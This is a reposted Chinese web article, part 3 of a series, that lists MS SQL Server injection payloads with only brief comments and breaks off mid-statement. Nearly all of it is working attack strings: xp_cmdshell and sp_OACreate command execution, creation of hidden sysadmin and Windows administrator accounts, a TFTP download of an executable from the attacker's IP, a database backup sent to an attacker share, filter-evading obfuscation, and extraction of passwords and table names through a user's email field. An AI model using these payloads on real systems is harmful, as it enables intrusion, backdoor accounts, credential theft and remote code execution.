常用SQL注射语句解析(3)

来源:转载

    aths(path)

values(@test)--

;use ku1;--

;create table cmd (str image);-- 建立image类型的表cmd

存在xp_cmdshell的测试过程:

;exec master..xp_cmdshell 'dir'

;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号

;exec master.dbo.sp_password null,jiaoniang$,1866574;--

;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--

;exec master.dbo.xp_cmdshell 'net user jiaoniang$ 1866574 /workstations:*

/times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--

;exec master.dbo.xp_cmdshell 'net localgroup administrators jiaoniang$

/add';--

exec master..xp_servicecontrol 'start', 'schedule' 启动服务

exec master..xp_servicecontrol 'start', 'server'

; DECLARE @shell INT EXEC SP_OACreate 'wscript.shell',@shell OUTPUT EXEC

SP_OAMETHOD @shell,'run',null, 'C:/WINNT/system32/cmd.exe /c net user

jiaoniang$ 1866574 /add'

;DECLARE @shell INT EXEC SP_OACreate 'wscript.shell',@shell OUTPUT EXEC

SP_OAMETHOD @shell,'run',null, 'C:/WINNT/system32/cmd.exe /c net

localgroup administrators jiaoniang$ /add'

'; exec master..xp_cmdshell 'tftp -i youip get file.exe'-- 利用TFTP上传文件

;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:/'

;declare @a sysname set @a='xp'+'_cm’+’dshell' exec @a 'dir c:/'

;declare @a;set @a=db_name();backup database @a to

disk='你的IP你的共享目录bak.dat'

如果被限制则可以。

select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec

master.dbo.sp_addlogin hax')

查询构造:

Select * FROM news Where id=... AND topic=... AND .....

admin'and 1=(select count(*) from [user] where username='victim' and

right(left(userpass,01),1)='1') and userpass <>'

select 123;--

;use master;--

:a' or name like 'fff%';-- 显示有一个叫ffff的用户哈。

and 1<>(select count(email) from [user]);--

;update [users] set email=(select top 1 name from sysobjects where

xtype='u' and status>0) where name='ffff';--

;update [users] set email=(select top 1 id from sysobjects where xtype='u'

and name='ad') where name='ffff';--

';update [users] set email=(select top 1 name from sysobjects where

xtype='u' and id>581577110) where name='ffff';--

';update [users] set email=(select top 1 count(id) from password) where

name='ffff';--

';update [users] set email=(select top 1 pwd from password where id=2)

where name='ffff';--

';update [users] set email=(select top 1 name from password where id=2)

where name='ffff';--

上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。

通过查看ffff的用户资料可得第一个用表叫ad

然后根据表名ad得到这个表的ID 得到第二个表的名字

insert into users values( 666,

char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),

char(0x63)+char(0x68)+char(0x72)+c

 

分享给朋友:
您可能感兴趣的文章:
随机阅读: